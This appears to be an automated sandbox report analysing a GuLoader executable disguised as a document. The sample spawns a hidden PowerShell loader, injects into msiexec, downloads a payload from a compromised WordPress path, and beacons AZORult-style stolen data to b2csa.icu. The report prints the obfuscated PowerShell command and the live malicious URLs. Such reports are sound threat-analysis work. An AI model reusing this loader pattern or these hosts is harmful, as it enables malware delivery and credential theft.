Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOCU800147001.exe

Overview

General Information

Sample name:DOCU800147001.exe
Analysis ID:1592041
MD5:ab99e49a4471901468bbbd9ccf228de0
SHA1:2b7302e1b24a9994e2924e97e627c1f5de23eaaa
SHA256:8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34
Tags:exeuser-threatinte1
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DOCU800147001.exe (PID: 364 cmdline: "C:\Users\user\Desktop\DOCU800147001.exe" MD5: AB99E49A4471901468BBBD9CCF228DE0)
    • powershell.exe (PID: 5664 cmdline: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1944 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.2613773694.0000000005D6B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.2547628074.000000000B13B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 107.151.162.135, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1944, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 52399
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5664, TargetFilename: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) ", CommandLine: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCU800147001.exe", ParentImage: C:\Users\user\Desktop\DOCU800147001.exe, ParentProcessId: 364, ParentProcessName: DOCU800147001.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) ", ProcessId: 5664, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T17:37:49.965763+010020294671Malware Command and Control Activity Detected192.168.2.652410104.21.32.180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T17:37:49.965763+010028102761Malware Command and Control Activity Detected192.168.2.652410104.21.32.180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T17:37:48.886834+010028032702Potentially Bad Traffic192.168.2.652399107.151.162.13580TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://b2csa.icu/PL341/index.phpAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exeReversingLabs: Detection: 18%
      Source: DOCU800147001.exeReversingLabs: Detection: 18%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: DOCU800147001.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Binary string: indows\System.Core.pdb@ source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbssio source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405E7E FindFirstFileA,FindClose,0_2_00405E7E
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040543A
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.6:52410 -> 104.21.32.1:80
      Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.6:52410 -> 104.21.32.1:80
      Source: global trafficTCP traffic: 192.168.2.6:52234 -> 1.1.1.1:53
      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:52399 -> 107.151.162.135:80
      Source: global trafficHTTP traffic detected: GET /wp-includes/block-bindings/wTryLAihFvcVmUK202.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: electricsuitcase.netCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: b2csa.icuContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9a 26 66 9d 45 70 9d 36 70 9d 34 10 8b 30 63 8b 30 6c 8b 31 11 e8 47 70 9d 35 13 8b 30 64 8b 30 61 8b 30 6d eb Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&fEp6p40c0l1Gp50d0a0m
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-includes/block-bindings/wTryLAihFvcVmUK202.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: electricsuitcase.netCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: electricsuitcase.net
      Source: global trafficDNS traffic detected: DNS query: b2csa.icu
      Source: unknownHTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: b2csa.icuContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9a 26 66 9d 45 70 9d 36 70 9d 34 10 8b 30 63 8b 30 6c 8b 31 11 e8 47 70 9d 35 13 8b 30 64 8b 30 61 8b 30 6d eb Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&fEp6p40c0l1Gp50d0a0m
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 15 Jan 2025 16:37:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTVYzcncbwZN93Zokk1tNPrNLZiYYMYKHAu2EIUPoeNNWthLUFPlwVBGThHp%2FyMTu5eqdNVYBd1rh5anhsst%2FckwQuqqF4dAP3ZVKtDqn3jU6%2B6t3qsGTbUbAwE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90274aeafed88ce6-EWRData Raw: 31 31 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 Data Ascii: 11d0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Suspected phishing site | C
      Source: msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/
      Source: msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/P5
      Source: msiexec.exe, 00000008.00000003.2613392527.00000000220F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.php
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpFv
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpVVWT
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpal
      Source: msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpj
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/m32
      Source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin2
      Source: DOCU800147001.exe, DOCU800147001.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: DOCU800147001.exe, DOCU800147001.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00404FA3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FA3

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exeJump to dropped file
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_004047E20_2_004047E2
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
      Source: DOCU800147001.exeStatic PE information: invalid certificate
      Source: DOCU800147001.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/15@2/2
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_004042A6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042A6
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile created: C:\Users\user\AppData\Local\RamtilsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
      Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-7A741079-43F57E69-FD6F148E
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile created: C:\Users\user\AppData\Local\Temp\nsw530.tmpJump to behavior
      Source: DOCU800147001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: DOCU800147001.exeReversingLabs: Detection: 18%
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile read: C:\Users\user\Desktop\DOCU800147001.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\DOCU800147001.exe "C:\Users\user\Desktop\DOCU800147001.exe"
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
